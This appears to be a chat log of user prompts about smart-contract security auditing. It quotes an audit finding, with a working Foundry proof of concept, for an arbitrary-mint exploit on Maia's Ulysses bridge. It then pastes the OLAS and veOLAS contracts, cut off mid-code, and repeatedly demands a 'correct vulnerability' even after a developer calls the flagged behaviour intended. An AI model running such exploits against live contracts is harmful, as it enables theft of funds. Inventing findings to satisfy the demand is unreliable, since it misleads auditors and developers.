question:here is the correct vulnerability look like learn from it Lines of code https://github.com/code-423n4/2023-05-maia/blob/54a45beb1428d85999da3f721f923cbf36ee3d35/src/ulysses-omnichain/BranchBridgeAgent.sol#L275-L316 https://github.com/code-423n4/2023-05-maia/blob/54a45beb1428d85999da3f721f923cbf36ee3d35/src/ulysses-omnichain/RootBridgeAgent.sol#L860-L1174 https://github.com/code-423n4/2023-05-maia/blob/54a45beb1428d85999da3f721f923cbf36ee3d35/src/ulysses-omnichain/RootBridgeAgentExecutor.sol#L259-L299 https://github.com/code-423n4/2023-05-maia/blob/54a45beb1428d85999da3f721f923cbf36ee3d35/src/ulysses-omnichain/RootBridgeAgent.sol#L404-L426 https://github.com/code-423n4/2023-05-maia/blob/54a45beb1428d85999da3f721f923cbf36ee3d35/src/ulysses-omnichain/RootPort.sol#L276-L284 Vulnerability details Impact Adversary can construct an attack vector that let’s him mint arbitrary amount of hToken’s on the Root Chain. Note End-to-end coded PoC is at the end of PoC section. Proof of Concept Background The attack will start on a Branch Chain where we have some underlying ERC20 token and a corresponding hToken that represents token within the omnichain system. The callOutSignedAndBridgeMultiple(...) function is supposed to bridge multiple tokens to a destination chain and also carry the msg.sender so that the tokens can be credited to msg.sender's VirtualAccount. The attacker will call the function with such DepositMultipleInputParams _dParams that take advantage of several weaknesses contained within the function (below is an overview of DepositMultipleInput struct & flow diagram of BranchBridgeAgent). struct DepositMultipleInput { //Deposit Info address[] hTokens; //Input Local hTokens Address. address[] tokens; //Input Native / underlying Token Address. uint256[] amounts; //Amount of Local hTokens deposited for interaction. uint256[] deposits; //Amount of native tokens deposited for interaction. uint24 toChain; //Destination chain for interaction. } Weakness #1 is that the supplied array of tokens address[] hTokens in _dParams is not checked if it exceeds 256, this causes an obvious issue where if hTokens length is > 256 the recorded length in packedData will be wrong since it's using an unsafe cast to uint8 and will overflow - uint8(_dParams.hTokens.length) . function callOutSignedAndBridgeMultiple( bytes calldata _params, DepositMultipleInput memory _dParams, uint128 _remoteExecutionGas ) external payable lock requiresFallbackGas { // code ... //Encode Data for cross-chain call. bytes memory packedData = abi.encodePacked( bytes1(0x06), msg.sender, uint8(_dParams.hTokens.length), depositNonce, _dParams.hTokens, _dParams.tokens, _dParams.amounts, _deposits, _dParams.toChain, _params, msg.value.toUint128(), _remoteExecutionGas ); // code ... _depositAndCallMultiple(...); } Weakness #2 arises in the subsequent internal function _depositAndCallMultiple(...), where the only check done on the supplied hTokens, tokens, amounts & deposits arrays is if the lengths match, however, there is no check if the length is the same as the one passed earlier to packedData. function _depositAndCallMultiple( address _depositor, bytes memory _data, address[] memory _hTokens, address[] memory _tokens, uint256[] memory _amounts, uint256[] memory _deposits, uint128 _gasToBridgeOut ) internal { //Validate Input if ( _hTokens.length != _tokens.length || _tokens.length != _amounts.length || _amounts.length != _deposits.length ) revert InvalidInput(); //Deposit and Store Info _createDepositMultiple(_depositor, _hTokens, _tokens, _amounts, _deposits, _gasToBridgeOut); //Perform Call _performCall(_data); } Lastly, weakness #3 is that bridgeOutMultiple(...), called within _createDepositMultiple(...), allows for supplying any address in the hTokens array since it only performs operations on these addresses if - _deposits[i] > 0 or _amounts[i] - _deposits[i] > 0 - in other words - if we set deposits[i] = 0 & amounts[i] = 0 we can supply ANY address in hTokens[i]. function bridgeOutMultiple( address _depositor, address[] memory _localAddresses, address[] memory _underlyingAddresses, uint256[] memory _amounts, uint256[] memory _deposits ) external virtual requiresBridgeAgent { for (uint256 i = 0; i < _localAddresses.length;) { if (_deposits[i] > 0) { _underlyingAddresses[i].safeTransferFrom( _depositor, address(this), _denormalizeDecimals(_deposits[i], ERC20(_underlyingAddresses[i]).decimals()) ); } if (_amounts[i] - _deposits[i] > 0) { _localAddresses[i].safeTransferFrom(_depositor, address(this), _amounts[i] - _deposits[i]); ERC20hTokenBranch(_localAddresses[i]).burn(_amounts[i] - _deposits[i]); } unchecked { i++; } } } Supplying the attack vector The attacker will construct such DepositMultipleInput _dParams where address[] hTokens will have a length of 257 where all entries, except hTokens[1], hTokens[2] & hTokens[3] , will contain the Branch address of the same hToken (note that in the examined functions above there is no restriction to supply the same hToken address multiple times). In a similar way address[] tokens will have length of 257, however, here all entries will contain the underlying token (it is crucial to include the address of the underlying token to bypass _normalizeDecimals). Next uint256[] amounts will be of length 257 where all entries will contain 0. Similarly uint256[] deposits will be of length 257 where all entries will contain 0. In such configuration the attacker is able to supply a malicious hToken address as per weakness #3. The crucial part now is that hTokens[1] will contain the address of the underlying token - this is needed to later bypass the params check on the RootChain. hTokens[2] & hTokens[3] will contain the attacker’s malicious payload address that when converted to bytes and then uint256 will represent the arbitrary amount of tokens that the attacker will mint (this conversion will happen on the RootChain). This is how the attack vector looks expressed in code. // hToken address, note the "h" in the var name address addr1 = avaxMockAssethToken; // underlying address address addr2 = address(avaxMockAssetToken); // 0x2FAF0800 when packed to bytes and then cast to uint256 = 800000000 // this amount will be minted on Root address malicious_address = address(0x2FAF0800); uint256 amount1 = 0; uint256 amount2 = 0; uint num = 257; address[] memory htokens = new address[](num); address[] memory tokens = new address[](num); uint256[] memory amounts = new uint256[](num); uint256[] memory deposits = new uint256[](num); for(uint i=0; i<num; i++) { htokens[i] = addr1; tokens[i] = addr2; amounts[i] = amount1; deposits[i] = amount2; } // address of the underlying token htokens[1] = addr2; // copy of entry containing the arbitrary number of tokens htokens[2] = malicious_address; // entry containing the arbitrary number of tokens -> this one will be actually fed to mint on Root htokens[3] = malicious_address; uint24 toChain = rootChainId; // create input DepositMultipleInput memory input = DepositMultipleInput({ hTokens:htokens, tokens:tokens, amounts:amounts, deposits:deposits, toChain:toChain }); Essentially what happens now is that the attacker has packedData that contains 257 hTokens, tokens, amounts & deposits , however due to weakness #1 the recorded length is 1 and due to weakness #2 and #3 this construction of the Input will reach _peformCal(data) and the mismatch between the number of entries and the actual number of supplied entries will cause malicious behavior on the RootChain. bytes memory packedData = abi.encodePacked( bytes1(0x06), msg.sender, uint8(_dParams.hTokens.length), depositNonce, _dParams.hTokens, _dParams.tokens, _dParams.amounts, _deposits, _dParams.toChain, _params, msg.value.toUint128(), _remoteExecutionGas ); The attack vector is inline with the general encoding scheme displayed below, the important note is that Length will contain a value of 1 instead of 257 which will disrupt the decoding on the RootBranch. More details about the encoding can be found in IRootBridgeAgent.sol . +--------+----------+--------+--------------+---------------------------+---------------------+----------------------+-----------------------+---------+------+----------+ | Flag | Signer | Length | depositNonce | hTokens[0], [1] ... [256] | tokens[0] ... [256] | amounts[0] ... [256] | deposits[0] ... [256] | toChain | data | gas | +--------+----------+--------+--------------+---------------------------+---------------------+----------------------+-----------------------+---------+------+----------+ | 1 byte | 20 bytes | 1 byte | 4 bytes | 32 bytes * 257 | 32 bytes * 257 | 32 bytes * 257 | 32 bytes * 257 | 3 bytes | any | 32 bytes | +--------+----------+--------+--------------+---------------------------+---------------------+----------------------+-----------------------+---------+------+----------+ RootBranch receives the attack vector The entry point for a message on the Root Chain is anyExecute(bytes calldata data) in RootBridgeAgent.sol - this will be called by Multichain’s AnycallExecutor. The function will unpack and navigate the supplied flag 0x06 - corresponding to callOutSignedAndBridgeMultiple(...) that was invoked on the Branch Chain. Next executeSignedWithDepositMultiple(...)will be invoked residing in RootBridgeAgentExecutor.sol, which will subsequently call _bridgeInMultiple(...), however, the amount of data passed to _bridgeInMultiple(...) depends on the packed length of the hTokens array. function executeSignedWithDepositMultiple( address _account, address _router, bytes calldata _data, uint24 _fromChainId ) external onlyOwner returns (bool success, bytes memory result) { //Bridge In Assets DepositMultipleParams memory dParams = _bridgeInMultiple( _account, _data[ PARAMS_START_SIGNED: PARAMS_END_SIGNED_OFFSET + uint16(uint8(bytes1(_data[PARAMS_START_SIGNED]))) * PARAMS_TKN_SET_SIZE_MULTIPLE ], _fromChainId ); // more code ... If we examine closer the constants and check with the encoding scheme - PARAMS_START_SIGNED = 21 PARAMS_END_SIGNED_OFFSET = 29 PARAMS_TKN_SET_SIZE_MULTIPLE = 128, Here the intended behavior is that _data is sliced in such a way that it removes the flag bytes1(0x06) and the msg.sender address, hence we start at byte 21, we have 29 to account for the bytes4(nonce), bytes3(chainId) and bytes1(length) (total of 8 bytes, but remember that byte slicing is exclusive of the second byte index) + uint16(length) * 128 for every set of htoken token amount & deposit . What will happen in the attack case is that _data will be cut short since length will be 1 instead of 257 and _data will contain length, nonce, chainId and the first 4 entries of the constructed hTokens[] array. Now _bridgeInMultiple will unpack the _dParams where numOfAssets = 1, hence only 1 iteration, and will populate a set with in reality the first 4 entries of the supplied hTokens[] in the attack vector - hTokens[0] = hToken address, tokens[0] = token address, amounts[0] = malicious address payload cast to uint256, deposits[0] = malicious address payload cast to uint256. function _bridgeInMultiple(address _recipient, bytes calldata _dParams, uint24 _fromChain) internal returns (DepositMultipleParams memory dParams) { // Parse Parameters uint8 numOfAssets = uint8(bytes1(_dParams[0])); uint32 nonce = uint32(bytes4(_dParams[PARAMS_START:5])); uint24 toChain = uint24(bytes3(_dParams[_dParams.length - 3:_dParams.length])); address[] memory hTokens = new address[](numOfAssets); address[] memory tokens = new address[](numOfAssets); uint256[] memory amounts = new uint256[](numOfAssets); uint256[] memory deposits = new uint256[](numOfAssets); for (uint256 i = 0; i < uint256(uint8(numOfAssets));) { //Parse Params hTokens[i] = address( uint160( bytes20( bytes32( _dParams[ PARAMS_TKN_START + (PARAMS_ENTRY_SIZE * i) + 12: PARAMS_TKN_START + (PARAMS_ENTRY_SIZE * (PARAMS_START + i)) ] ) ) ) ); tokens[i] = address( uint160( bytes20( _dParams[ PARAMS_TKN_START + PARAMS_ENTRY_SIZE * uint16(i + numOfAssets) + 12: PARAMS_TKN_START + PARAMS_ENTRY_SIZE * uint16(PARAMS_START + i + numOfAssets) ] ) ) ); amounts[i] = uint256( bytes32( _dParams[ PARAMS_TKN_START + PARAMS_AMT_OFFSET * uint16(numOfAssets) + (PARAMS_ENTRY_SIZE * uint16(i)): PARAMS_TKN_START + PARAMS_AMT_OFFSET * uint16(numOfAssets) + PARAMS_ENTRY_SIZE * uint16(PARAMS_START + i) ] ) ); deposits[i] = uint256( bytes32( _dParams[ PARAMS_TKN_START + PARAMS_DEPOSIT_OFFSET * uint16(numOfAssets) + (PARAMS_ENTRY_SIZE * uint16(i)): PARAMS_TKN_START + PARAMS_DEPOSIT_OFFSET * uint16(numOfAssets) + PARAMS_ENTRY_SIZE * uint16(PARAMS_START + i) ] ) ); unchecked { ++i; } } //Save Deposit Multiple Params dParams = DepositMultipleParams({ numberOfAssets: numOfAssets, depositNonce: nonce, hTokens: hTokens, tokens: tokens, amounts: amounts, deposits: deposits, toChain: toChain }); RootBridgeAgent(payable(msg.sender)).bridgeInMultiple(_recipient, dParams, _fromChain); } Subsequently bridgeInMultiple(...) is called in RootBridgeAgent.sol, where bridgeIn(...) is called for every set of hToken, token, amount & deposit - one iteration in the attack scenario. bridgeIn(...) now performs the critical checkParams from the CheckParamsLib library where if only 1 of 3 conditions is true we will have a revert. The first check is revert if _dParams.amount < _dParams.deposit - this is false since amount & deposit are equal to the uint256 cast of the bytes packing of the malicious address payload. The second check is: (_dParams.amount > 0 && !IPort(_localPortAddress).isLocalToken(_dParams.hToken, _fromChain)) Here it’s true amount > 0 , however, _dParams.hToken is the first entry hTokens[0] of the attack vector’s hTokens[] array, therefore, it is a valid address & isLocalToken(…) will return true and will be negated by ! which will make the statement false because of &&, therefore, it is bypassed. The third check is: (_dParams.deposit > 0 && !IPort(_localPortAddress).isUnderlyingToken(_dParams.token, _fromChain)) here it’s true deposit > 0 , however, _dParams.token is the second entry hTokens[1] of the attack vector’s hTokens[] array, therefore, it is a valid underlying address & isUnderlyingToken(…) will return true and will be negated by ! which will make the statement false because of &&, therefore, it is bypassed. Whole checkParams(…) function checkParams(address _localPortAddress, DepositParams memory _dParams, uint24 _fromChain) internal view returns (bool) { if ( (_dParams.amount < _dParams.deposit) //Deposit can't be greater than amount. || (_dParams.amount > 0 && !IPort(_localPortAddress).isLocalToken(_dParams.hToken, _fromChain)) //Check local exists. || (_dParams.deposit > 0 && !IPort(_localPortAddress).isUnderlyingToken(_dParams.token, _fromChain)) //Check underlying exists. ) { return false; } return true; } Now back to bridgeIn(...) in RootBridgeAgent we get the globalAddress for _dParams.hToken (again this is the valid hToken[0] address from Branch Chain) and bridgeToRoot(...) is called that resides in RootPort.sol. //Get global address address globalAddress = IPort(localPortAddress).getGlobalTokenFromLocal(_dParams.hToken, _fromChain); //Check if valid asset if (globalAddress == address(0)) revert InvalidInputParams(); //Move hTokens from Branch to Root + Mint Sufficient hTokens to match new port deposit IPort(localPortAddress).bridgeToRoot(_recipient, globalAddress, _dParams.amount, _dParams.deposit, _fromChain); bridgeToRoot(...) will check if the globalAddress is valid and it is since we got it from the valid hTokens[0] entry in the constructed attack. Then _amount - _deposit = 0 , therefore, no tokens will be transferred and finally the critical line if (_deposit > 0) mint(_recipient, _hToken, _deposit, _fromChainId) here _deposit is the malicious address payload that was packed to bytes and then unpacked and cast to uint256 & _hToken is the global address that we got from hTokens[0] back in the unpacking, therefore whatever the value of the uint256 representation of the malicious address is will be minted to the attacker. Coded PoC Copy the two functions testArbitraryMint & _prepareAttackVector in test/ulysses-omnichain/RootTest.t.sol and place them in the RootTest contract after the setup. Execute with forge test --match-test testArbitraryMint -vv Result - 800000000 minted tokens for free in attacker’s Virtual Account function testArbitraryMint() public { // setup function used by developers to add local/global tokens in the system testAddLocalTokenArbitrum(); // set attacker address & mint 1 ether to cover gas cost address attacker = address(0xAAAA); hevm.deal(attacker, 1 ether); // get avaxMockAssetHtoken global address that's on the Root address globalAddress = rootPort.getGlobalTokenFromLocal(avaxMockAssethToken, avaxChainId); // prepare attack vector bytes memory params = ""; DepositMultipleInput memory dParams = _prepareAttackVector(); uint128 remoteExecutionGas = 200_000_000_0; console2.log("------------------"); console2.log("------------------"); console2.log("ARBITRARY MINT LOG"); console2.log("Attacker address", attacker); console2.log("Avax h token address",avaxMockAssethToken); console2.log("Avax underlying address", address(avaxMockAssetToken)); console2.log("Attacker h token balance", ERC20hTokenBranch(avaxMockAssethToken).balanceOf(attacker)); console2.log("Attacker underlying balance", avaxMockAssetToken.balanceOf(attacker)); // execute attack hevm.prank(attacker); avaxMulticallBridgeAgent.callOutSignedAndBridgeMultiple{value: 0.00005 ether}(params, dParams, remoteExecutionGas); // get attacker's virtual account address address vaccount = address(rootPort.getUserAccount(attacker)); console2.log("Attacker h token balance avax", ERC20hTokenBranch(avaxMockAssethToken).balanceOf(attacker)); console2.log("Attacker underlying balance avax", avaxMockAssetToken.balanceOf(attacker)); console2.log("Attacker h token balance root", ERC20hTokenRoot(globalAddress).balanceOf(vaccount)); console2.log("ARBITRARY MINT LOG END"); console2.log("------------------"); } function _prepareAttackVector() internal view returns(DepositMultipleInput memory) { // hToken address address addr1 = avaxMockAssethToken; // underlying address address addr2 = address(avaxMockAssetToken); // 0x2FAF0800 when encoded to bytes and then cast to uint256 = 800000000 address malicious_address = address(0x2FAF0800); uint256 amount1 = 0; uint256 amount2 = 0; uint num = 257; address[] memory htokens = new address[](num); address[] memory tokens = new address[](num); uint256[] memory amounts = new uint256[](num); uint256[] memory deposits = new uint256[](num); for(uint i=0; i<num; i++) { htokens[i] = addr1; tokens[i] = addr2; amounts[i] = amount1; deposits[i] = amount2; } // address of the underlying token htokens[1] = addr2; // copy of entry containing the arbitrary number of tokens htokens[2] = malicious_address; // entry containing the arbitrary number of tokens -> this one will be actually fed to mint on Root htokens[3] = malicious_address; uint24 toChain = rootChainId; // create input DepositMultipleInput memory input = DepositMultipleInput({ hTokens:htokens, tokens:tokens, amounts:amounts, deposits:deposits, toChain:toChain }); return input; } Tools Used Manual inspection Recommendation Enforce more strict checks around input param validation on bridging multiple tokens. Assessed type Invalid Validation

question:from you deeper understanding and what you learn Review and scan line by line the code, looking for any trace of vulnerabilities and find the correct vulnerability that is exist in this contract with depth understanding in solidity and in finding vulnerability and then confirm the vulnerability with evidence and give the vulnerable part that cause the bug with explaining and then give high-quality bug report // SPDX-License-Identifier: MIT pragma solidity ^0.8.15; import "../lib/solmate/src/tokens/ERC20.sol"; /// @dev Only `manager` has a privilege, but the `sender` was provided. /// @param sender Sender address. /// @param manager Required sender address as a manager. error ManagerOnly(address sender, address manager); /// @dev Provided zero address. error ZeroAddress(); /// @title OLAS - Smart contract for the OLAS token. /// @author AL /// @author Aleksandr Kuperman - <[email protected]> contract OLAS is ERC20 { event MinterUpdated(address indexed minter); event OwnerUpdated(address indexed owner); // One year interval uint256 public constant oneYear = 1 days * 365; // Total supply cap for the first ten years (one billion OLAS tokens) uint256 public constant tenYearSupplyCap = 1_000_000_000e18; // Maximum annual inflation after first ten years uint256 public constant maxMintCapFraction = 2; // Initial timestamp of the token deployment uint256 public immutable timeLaunch; // Owner address address public owner; // Minter address address public minter; constructor() ERC20("Autonolas", "OLAS", 18) { owner = msg.sender; minter = msg.sender; timeLaunch = block.timestamp; } /// @dev Changes the owner address. /// @param newOwner Address of a new owner. function changeOwner(address newOwner) external { if (msg.sender != owner) { revert ManagerOnly(msg.sender, owner); } if (newOwner == address(0)) { revert ZeroAddress(); } owner = newOwner; emit OwnerUpdated(newOwner); } /// @dev Changes the minter address. /// @param newMinter Address of a new minter. function changeMinter(address newMinter) external { if (msg.sender != owner) { revert ManagerOnly(msg.sender, owner); } if (newMinter == address(0)) { revert ZeroAddress(); } minter = newMinter; emit MinterUpdated(newMinter); } /// @dev Mints OLAS tokens. /// @notice If the inflation control does not pass, the revert does not take place, as well as no action is performed. /// @param account Account address. /// @param amount OLAS token amount. function mint(address account, uint256 amount) external { // Access control if (msg.sender != minter) { revert ManagerOnly(msg.sender, minter); } // Check the inflation schedule and mint if (inflationControl(amount)) { _mint(account, amount); } } /// @dev Provides various checks for the inflation control. /// @notice The `<=` check is left as is for a better code readability. /// @param amount Amount of OLAS to mint. /// @return True if the amount request is within inflation boundaries. function inflationControl(uint256 amount) public view returns (bool) { uint256 remainder = inflationRemainder(); return (amount <= remainder); } /// @dev Gets the reminder of OLAS possible for the mint. /// @return remainder OLAS token remainder. function inflationRemainder() public view returns (uint256 remainder) { uint256 _totalSupply = totalSupply; // Current year uint256 numYears = (block.timestamp - timeLaunch) / oneYear; // Calculate maximum mint amount to date uint256 supplyCap = tenYearSupplyCap; // After 10 years, adjust supplyCap according to the yearly inflation % set in maxMintCapFraction if (numYears > 9) { // Number of years after ten years have passed (including ongoing ones) numYears -= 9; for (uint256 i = 0; i < numYears; ++i) { supplyCap += (supplyCap * maxMintCapFraction) / 100; } } // Check for the requested mint overflow remainder = supplyCap - _totalSupply; } /// @dev Burns OLAS tokens. /// @param amount OLAS token amount to burn. function burn(uint256 amount) external { _burn(msg.sender, amount); } /// @dev Decreases the allowance of another account over their tokens. /// @notice This implementation does not decrease spender allowance if the maximum allowance was granted. /// @notice The underflow condition is treated by the default code generation check. /// @param spender Account that tokens are approved for. /// @param amount Amount to decrease approval by. /// @return True if the operation succeeded. function decreaseAllowance(address spender, uint256 amount) external returns (bool) { uint256 spenderAllowance = allowance[msg.sender][spender]; if (spenderAllowance != type(uint256).max) { spenderAllowance -= amount; allowance[msg.sender][spender] = spenderAllowance; emit Approval(msg.sender, spender, spenderAllowance); } return true; } /// @dev Increases the allowance of another account over their tokens. /// @notice The overflow condition is treated by the default code generation check. /// @param spender Account that tokens are approved for. /// @param amount Amount to increase approval by. /// @return True if the operation succeeded. function increaseAllowance(address spender, uint256 amount) external returns (bool) { uint256 spenderAllowance = allowance[msg.sender][spender]; spenderAllowance += amount; allowance[msg.sender][spender] = spenderAllowance; emit Approval(msg.sender, spender, spenderAllowance); return true; } }

question:but it doesn't revert by design, it just does not mint There is no such a scenario since it's only a minter that can call the mint() function, and the minter is the Treasury contract. We don't want it to revert, but just not mint. However, following the contract logic we have ensured with other checks that this scenario must never happen in the first place.

question:eview and scan line by line the code, looking for any trace of vulnerabilities and find the correct vulnerability that is exist in this contract with depth understanding in solidity and in finding vulnerability and then confirm the vulnerability with evidence and give the vulnerable part that cause the bug with explaining and then give high-quality bug report AND FIND the valid report as the bug i give in the previous report // SPDX-License-Identifier: MIT pragma solidity ^0.8.15; import "@openzeppelin/contracts/governance/utils/IVotes.sol"; import "@openzeppelin/contracts/token/ERC20/IERC20.sol"; import "@openzeppelin/contracts/utils/introspection/IERC165.sol"; import "./interfaces/IErrors.sol"; /** Votes have a weight depending on time, so that users are committed to the future of (whatever they are voting for). Vote weight decays linearly over time. Lock time cannot be more than `MAXTIME` (4 years). Voting escrow has time-weighted votes derived from the amount of tokens locked. The maximum voting power can be achieved with the longest lock possible. This way the users are incentivized to lock tokens for more time. # w ^ = amount * time_locked / MAXTIME # 1 + / # | / # | / # | / # |/ # 0 +--------+------> time # maxtime (4 years?) We cannot really do block numbers per se because slope is per time, not per block, and per block could be fairly bad because Ethereum changes its block times. What we can do is to extrapolate ***At functions. */ /// @title Voting Escrow OLAS - the workflow is ported from Curve Finance Vyper implementation /// @author Aleksandr Kuperman - <[email protected]> /// Code ported from: https://github.com/curvefi/curve-dao-contracts/blob/master/contracts/VotingEscrow.vy /// and: https://github.com/solidlyexchange/solidly/blob/master/contracts/ve.sol /* This VotingEscrow is based on the OLAS token that has the following specifications: * - For the first 10 years there will be the cap of 1 billion (1e27) tokens; * - After 10 years, the inflation rate is 2% per year. * The maximum number of tokens for each year then can be calculated from the formula: 2^n = 1e27 * (1.02)^x, * where n is the specified number of bits that is sufficient to store and not overflow the total supply, * and x is the number of years. We limit n by 128, thus it would take 1340+ years to reach that total supply. * The amount for each locker is eventually cannot overcome this number as well, and thus uint128 is sufficient. * * We then limit the time in seconds to last until the value of 2^64 - 1, or for the next 583+ billion years. * The number of blocks is essentially cannot be bigger than the number of seconds, and thus it is safe to assume * that uint64 for the number of blocks is also sufficient. * * We also limit the individual deposit amount to be no bigger than 2^96 - 1, or the value of total supply in 220+ years. * This limitation is dictated by the fact that there will be at least several accounts with locked tokens, and the * sum of all of them cannot be bigger than the total supply. Checking the limit of deposited / increased amount * allows us to perform the unchecked operation on adding the amounts. * * The rest of calculations throughout the contract do not go beyond specified limitations. The contract was checked * by echidna and the results can be found in the audit section of the repository. * * These specified limits allowed us to have storage-added structs to be bound by 2*256 and 1*256 bit sizes * respectively, thus limiting the gas amount compared to using bigger variable sizes. * * Note that after 220 years it is no longer possible to deposit / increase the locked amount to be bigger than 2^96 - 1. * It is going to be not safe to use this contract for governance after 1340 years. */ // Struct for storing balance and unlock time // The struct size is one storage slot of uint256 (128 + 64 + padding) struct LockedBalance { // Token amount. It will never practically be bigger. Initial OLAS cap is 1 bn tokens, or 1e27. // After 10 years, the inflation rate is 2% per year. It would take 1340+ years to reach 2^128 - 1 uint128 amount; // Unlock time. It will never practically be bigger uint64 endTime; } // Structure for voting escrow points // The struct size is two storage slots of 2 * uint256 (128 + 128 + 64 + 64 + 128) struct PointVoting { // w(i) = at + b (bias) int128 bias; // dw / dt = a (slope) int128 slope; // Timestamp. It will never practically be bigger than 2^64 - 1 uint64 ts; // Block number. It will not be bigger than the timestamp uint64 blockNumber; // Token amount. It will never practically be bigger. Initial OLAS cap is 1 bn tokens, or 1e27. // After 10 years, the inflation rate is 2% per year. It would take 1340+ years to reach 2^128 - 1 uint128 balance; } /// @notice This token supports the ERC20 interface specifications except for transfers and approvals. contract veOLAS is IErrors, IVotes, IERC20, IERC165 { enum DepositType { DEPOSIT_FOR_TYPE, CREATE_LOCK_TYPE, INCREASE_LOCK_AMOUNT, INCREASE_UNLOCK_TIME } event Deposit(address indexed account, uint256 amount, uint256 locktime, DepositType depositType, uint256 ts); event Withdraw(address indexed account, uint256 amount, uint256 ts); event Supply(uint256 previousSupply, uint256 currentSupply); // 1 week time uint64 internal constant WEEK = 1 weeks; // Maximum lock time (4 years) uint256 internal constant MAXTIME = 4 * 365 * 86400; // Maximum lock time (4 years) in int128 int128 internal constant IMAXTIME = 4 * 365 * 86400; // Number of decimals uint8 public constant decimals = 18; // Token address address public immutable token; // Total token supply uint256 public supply; // Mapping of account address => LockedBalance mapping(address => LockedBalance) public mapLockedBalances; // Total number of economical checkpoints (starting from zero) uint256 public totalNumPoints; // Mapping of point Id => point mapping(uint256 => PointVoting) public mapSupplyPoints; // Mapping of account address => PointVoting[point Id] mapping(address => PointVoting[]) public mapUserPoints; // Mapping of time => signed slope change mapping(uint64 => int128) public mapSlopeChanges; // Voting token name string public name; // Voting token symbol string public symbol; /// @dev Contract constructor /// @param _token Token address. /// @param _name Token name. /// @param _symbol Token symbol. constructor(address _token, string memory _name, string memory _symbol) { token = _token; name = _name; symbol = _symbol; // Create initial point such that default timestamp and block number are not zero // See cast specification in the PointVoting structure mapSupplyPoints[0] = PointVoting(0, 0, uint64(block.timestamp), uint64(block.number), 0); } /// @dev Gets the most recently recorded user point for `account`. /// @param account Account address. /// @return pv Last checkpoint. function getLastUserPoint(address account) external view returns (PointVoting memory pv) { uint256 lastPointNumber = mapUserPoints[account].length; if (lastPointNumber > 0) { pv = mapUserPoints[account][lastPointNumber - 1]; } } /// @dev Gets the number of user points. /// @param account Account address. /// @return accountNumPoints Number of user points. function getNumUserPoints(address account) external view returns (uint256 accountNumPoints) { accountNumPoints = mapUserPoints[account].length; } /// @dev Gets the checkpoint structure at number `idx` for `account`. /// @notice The out of bound condition is treated by the default code generation check. /// @param account User wallet address. /// @param idx User point number. /// @return The requested checkpoint. function getUserPoint(address account, uint256 idx) external view returns (PointVoting memory) { return mapUserPoints[account][idx]; } /// @dev Record global and per-user data to checkpoint. /// @param account Account address. User checkpoint is skipped if the address is zero. /// @param oldLocked Previous locked amount / end lock time for the user. /// @param newLocked New locked amount / end lock time for the user. /// @param curSupply Current total supply (to avoid using a storage total supply variable) function _checkpoint( address account, LockedBalance memory oldLocked, LockedBalance memory newLocked, uint128 curSupply ) internal { PointVoting memory uOld; PointVoting memory uNew; int128 oldDSlope; int128 newDSlope; uint256 curNumPoint = totalNumPoints; if (account != address(0)) { // Calculate slopes and biases // Kept at zero when they have to if (oldLocked.endTime > block.timestamp && oldLocked.amount > 0) { uOld.slope = int128(oldLocked.amount) / IMAXTIME; uOld.bias = uOld.slope * int128(uint128(oldLocked.endTime - uint64(block.timestamp))); } if (newLocked.endTime > block.timestamp && newLocked.amount > 0) { uNew.slope = int128(newLocked.amount) / IMAXTIME; uNew.bias = uNew.slope * int128(uint128(newLocked.endTime - uint64(block.timestamp))); } // Reads values of scheduled changes in the slope // oldLocked.endTime can be in the past and in the future // newLocked.endTime can ONLY be in the FUTURE unless everything is expired: then zeros oldDSlope = mapSlopeChanges[oldLocked.endTime]; if (newLocked.endTime > 0) { if (newLocked.endTime == oldLocked.endTime) { newDSlope = oldDSlope; } else { newDSlope = mapSlopeChanges[newLocked.endTime]; } } } PointVoting memory lastPoint; if (curNumPoint > 0) { lastPoint = mapSupplyPoints[curNumPoint]; } else { // If no point is created yet, we take the actual time and block parameters lastPoint = PointVoting(0, 0, uint64(block.timestamp), uint64(block.number), 0); } uint64 lastCheckpoint = lastPoint.ts; // initialPoint is used for extrapolation to calculate the block number and save them // as we cannot figure that out in exact values from inside of the contract PointVoting memory initialPoint = lastPoint; uint256 block_slope; // dblock/dt if (block.timestamp > lastPoint.ts) { // This 1e18 multiplier is needed for the numerator to be bigger than the denominator // We need to calculate this in > uint64 size (1e18 is > 2^59 multiplied by 2^64). block_slope = (1e18 * uint256(block.number - lastPoint.blockNumber)) / uint256(block.timestamp - lastPoint.ts); } // If last point is already recorded in this block, slope == 0, but we know the block already in this case // Go over weeks to fill in the history and (or) calculate what the current point is { // The timestamp is rounded by a week and < 2^64-1 uint64 tStep = (lastCheckpoint / WEEK) * WEEK; for (uint256 i = 0; i < 255; ++i) { // Hopefully it won't happen that this won't get used in 5 years! // If it does, users will be able to withdraw but vote weight will be broken // This is always practically < 2^64-1 unchecked { tStep += WEEK; } int128 dSlope; if (tStep > block.timestamp) { tStep = uint64(block.timestamp); } else { dSlope = mapSlopeChanges[tStep]; } lastPoint.bias -= lastPoint.slope * int128(int64(tStep - lastCheckpoint)); lastPoint.slope += dSlope; if (lastPoint.bias < 0) { // This could potentially happen, but fuzzer didn't find available "real" combinations lastPoint.bias = 0; } if (lastPoint.slope < 0) { // This cannot happen - just in case. Again, fuzzer didn't reach this lastPoint.slope = 0; } lastCheckpoint = tStep; lastPoint.ts = tStep; // After division by 1e18 the uint64 size can be reclaimed lastPoint.blockNumber = initialPoint.blockNumber + uint64((block_slope * uint256(tStep - initialPoint.ts)) / 1e18); lastPoint.balance = initialPoint.balance; // In order for the overflow of total number of economical checkpoints (starting from zero) // The _checkpoint() call must happen n >(2^256 -1)/255 or n > ~1e77/255 > ~1e74 times unchecked { curNumPoint += 1; } if (tStep == block.timestamp) { lastPoint.blockNumber = uint64(block.number); lastPoint.balance = curSupply; break; } else { mapSupplyPoints[curNumPoint] = lastPoint; } } } totalNumPoints = curNumPoint; // Now mapSupplyPoints is filled until current time if (account != address(0)) { // If last point was in this block, the slope change has been already applied. In such case we have 0 slope(s) lastPoint.slope += (uNew.slope - uOld.slope); lastPoint.bias += (uNew.bias - uOld.bias); if (lastPoint.slope < 0) { lastPoint.slope = 0; } if (lastPoint.bias < 0) { lastPoint.bias = 0; } } // Record the last updated point mapSupplyPoints[curNumPoint] = lastPoint; if (account != address(0)) { // Schedule the slope changes (slope is going down) // We subtract new_user_slope from [newLocked.endTime] // and add old_user_slope to [oldLocked.endTime] if (oldLocked.endTime > block.timestamp) { // oldDSlope was <something> - uOld.slope, so we cancel that oldDSlope += uOld.slope; if (newLocked.endTime == oldLocked.endTime) { oldDSlope -= uNew.slope; // It was a new deposit, not extension } mapSlopeChanges[oldLocked.endTime] = oldDSlope; } if 